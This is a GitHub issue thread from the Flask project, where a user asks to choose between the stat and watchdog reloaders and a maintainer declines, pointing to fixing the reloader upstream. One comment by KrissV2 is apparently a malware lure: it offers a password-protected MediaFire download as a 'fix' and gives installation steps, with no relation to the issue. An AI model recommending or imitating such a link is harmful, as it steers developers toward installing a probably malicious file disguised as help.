### ISSUE TITLE
Allow choice of reloader type

### ISSUE THREAD

**Issue by oelhammouchi** [pallets/flask#5598]
I know it was closed in #5007, but would it be possible to reconsider this? I'm having a lot of trouble with `watchdog` despite following all the fixes proposed  such as #2603. The reloader constantly detects spurious file changes, whereas I've never experienced such issues with `stat`. If you really dislike the idea of a new flag, maybe an environment variable would be an option?

Thanks a lot for the work on this awesome package!

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by davidism** [comment]
My comment in https://github.com/pallets/flask/issues/5007#issuecomment-1450877246 still applies. The solution is to fix the reloader, not to provide a toggle that users shouldn't need. If you have an issue with the reloader, create a minimal reproducible example and report that to Werkzeug or Watchdog.
